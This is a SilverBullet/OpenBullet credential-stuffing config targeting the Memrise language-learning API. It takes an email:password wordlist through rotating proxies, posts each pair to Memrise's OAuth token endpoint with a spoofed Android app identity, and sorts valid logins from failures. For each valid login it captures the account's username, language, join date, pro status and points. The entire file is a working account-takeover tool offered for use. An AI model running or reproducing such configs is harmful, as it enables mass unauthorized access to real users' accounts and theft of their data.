[SETTINGS]
{
  "Name": "Memrise_Api",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-03-04T15:17:39.0234115+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Memrise_Api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.memrise.com/v1.17/auth/access_token/" 
  CONTENT "client_id=16a084bff0bb7250ef9c&grant_type=password&username=<USER>&password=<PASS>&app_source=google" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept-Language: fr" 
  HEADER "User-Agent: Memrise/2022.2.9.0 (Android-Production-Google; google G011A; Android; 25)" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Charset: UTF-8" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Content-Length: 117" 
  HEADER "Host: api.memrise.com" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_client" 
  KEYCHAIN Success OR 
    KEY "access_token\":\"" 

#tk PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "tk" 

REQUEST GET "https://api.memrise.com/v1.17/me/" 
  
  HEADER "Authorization: Bearer <tk>" 
  HEADER "Accept-Language: fr" 
  HEADER "User-Agent: Memrise/2022.2.9.0 (Android-Production-Google; google G011A; Android; 25)" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Charset: UTF-8" 
  HEADER "Content-Length: 0" 
  HEADER "Host: api.memrise.com" 

#Username PARSE "<SOURCE>" LR "username\":\"" "\"" CreateEmpty=FALSE -> CAP "username" 

#language PARSE "<SOURCE>" LR "language\":\"" "\"" CreateEmpty=FALSE -> CAP "language" 

#date_joined PARSE "<SOURCE>" LR "date_joined\":\"" "T" CreateEmpty=FALSE -> CAP "date_joined" 

#pro PARSE "<SOURCE>" LR "\"is_pro\":" ",\"" CreateEmpty=FALSE -> CAP "pro" 

#points PARSE "<SOURCE>" LR "{\"points\":" "," CreateEmpty=FALSE -> CAP "Points" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config by" 

